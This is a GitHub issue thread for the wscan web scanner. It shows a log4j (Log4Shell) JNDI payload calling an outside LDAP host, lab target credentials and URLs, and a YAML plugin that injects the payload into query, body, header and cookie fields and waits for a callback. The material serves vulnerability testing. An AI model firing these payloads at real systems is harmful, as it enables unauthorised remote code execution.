How to use custom plugins to perform log4j RCE vulnerability scans？

chushuai / wscan

Wscan is a web security scanner that focuses on web security, dedicated to making web security accessible to everyone.

Other

488 stars 61 forks source link

How to use custom plugins to perform log4j RCE vulnerability scans？ #19

Open chushuai opened 1 week ago

chushuai commented 1 week ago

${jndi:ldap://xxx.xxx.xxx.xxxx:80/i/hcSvqI7U/71534c/303r/i9nl/PQ5P8iBh}

Target practice location https://zkaq:zkaq@d63bb2586.lab.aqlab.cn/

https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd

chushuai commented 1 week ago

name: custom-reverse

set:
  reverse: newReverse()
  reverseURL: reverse.ldap_url

payload:
  -  ${jndi:{{reverseURL}}}

placeholder:
  - query
  - body
  - header
  - cookie

expression: reverse.wait(15)

detail:
  author: shaochuyu
  links:
    - https://github.com/chushuai/wscan
  version: 1.0